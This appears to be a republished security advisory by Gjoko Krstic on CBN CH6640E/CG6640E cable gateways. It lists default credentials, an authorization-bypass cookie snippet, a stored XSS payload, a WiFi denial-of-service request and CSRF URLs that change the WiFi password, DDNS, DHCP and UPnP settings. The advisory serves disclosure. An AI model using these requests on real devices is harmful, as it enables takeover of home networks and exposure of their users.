CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities

2014.10.27
Credit: Gjoko 'LiquidWorm' Krstic
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities Vendor: Compal Broadband Networks (CBN), Inc. Product web page: http://www.icbn.com.tw Affected version: Model: CH6640 and CH6640E Hardware version: 1.0 Firmware version: CH6640-3.5.11.7-NOSH Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 DOCSIS mode: DOCSIS 3.0 Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway. Default credentials: admin/admin - Allow access gateway pages root/compalbn - Allow access gateway, provisioning pages and provide more configuration information. Desc: The CBN modem gateway suffers from multiple vulnerabilities including authorization bypass information disclosure, stored XSS, CSRF and denial of service. Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5203 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php 04.10.2014 --- Authorization Bypass Information Disclosure Vulnerability ######################################################### http://192.168.0.1/xml/CmgwWirelessSecurity.xml http://192.168.0.1/xml/DocsisConfigFile.xml http://192.168.0.1/xml/CmgwBasicSetup.xml http://192.168.0.1/basicDDNS.html http://192.168.0.1/basicLanUsers.html http://192.168.0.1:5000/rootDesc.xml Set cookie: userData to root or admin, reveals additional pages/info. -- <html> <body> <script> document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/"; </script> </body> </html> -- Denial of Service (DoS) for all WiFi connected clients (disconnect) ################################################################### GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1 Stored Cross-Site Scripting (XSS) Vulnerability ############################################### Cookie: userData Value: hax0r"><script>alert(document.cookie);</script> -- <html> <body> <script> document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/"; </script> </body> </html> -- Cross-Site Request Forgery (CSRF) Vulnerability ############################################### DDNS config: ------------ GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1 Change wifi pass: ----------------- GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1 Add static mac address (static assigned dhcp client): ----------------------------------------------------- GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1 Enable/Disable UPnP: -------------------- GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top